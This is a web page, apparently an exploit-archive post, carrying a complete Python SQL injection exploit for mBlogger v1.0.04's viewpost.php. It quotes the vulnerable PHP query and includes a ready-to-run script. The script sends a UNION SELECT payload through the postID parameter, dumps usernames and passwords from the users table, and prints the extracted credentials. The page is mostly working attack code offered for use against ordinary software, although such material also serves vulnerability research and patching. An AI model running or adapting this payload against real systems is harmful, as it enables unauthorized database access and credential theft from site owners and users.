Home / os / win7

mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit

Posted on 01 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================
mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
=====================================================

#!/usr/bin/python
#
# Exploit Title:   mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
# Date         :   31 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/mblogger/
# Version      :   1.0.04
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + viewpost.php =&gt; SQL Injection!!
#
# 30: $query = &quot;SELECT id, name, subject, message, posted FROM posts WHERE
#     id = '$_GET[postID]'&quot;;
# 31: $result = mysql_query($query) or die(mysql_error());
# 32: while($row = mysql_fetch_array($result, MYSQL_ASSOC))
# 33: {
# 34:   echo &quot;&lt;div class='posttitle'&gt;&quot;;
# 35:   echo &quot;&lt;h3&gt;&quot; . $row['subject'] . &quot;&lt;/h3&gt;&quot;;
# 36:   echo &quot;&lt;/div&gt;&quot;;
# 37:   echo &quot;&lt;div class='postbody'&gt;&quot;;
# 38:   echo &quot;&lt;p&gt; Posted by: &quot; . $row['name'] . &quot; on &quot; . $row['posted'] . &quot;&lt;/p&gt;&quot;;
# 39:   echo &quot;&lt;p&gt;&quot; . $row['message'] . &quot;&lt;/p&gt;&quot;;
# 40:   echo &quot;&lt;/div&gt;&quot;;
# 41:   $postID = $row['id'];
# 42: }
#
 
import re
import sys
import http.client
 
 
def usage(prog):
    print('Usage  : ' + prog + ' &lt;target&gt; &lt;path&gt;
')
    print('Example: ' + prog + ' localhost /mBlogger/')
    print('         ' + prog + ' www.target.com /complet/path/')
    return
 
 
def exploit(target, path):
    payload  = 'viewpost.php?postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    payload += 'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    payload += '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'
 
    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
 
    if res.status != 200:
        print('[!] HTTP GET Request Failed')
        exit(1)
 
    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r&quot;&lt;1&gt;(.+?)&lt;2&gt;&quot;, re.M)
     
    print('[+] Information Extracted:
')
    credentials = pattern.findall(data)
    for element in credentials:
        print(element)
     
    return
 
 
 
print('
+-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit by Ptrace Security    |')
print('+-----------------------------------------------------------------------------+
')
 
if len(sys.argv) != 3:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2])
 
exit(0)


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP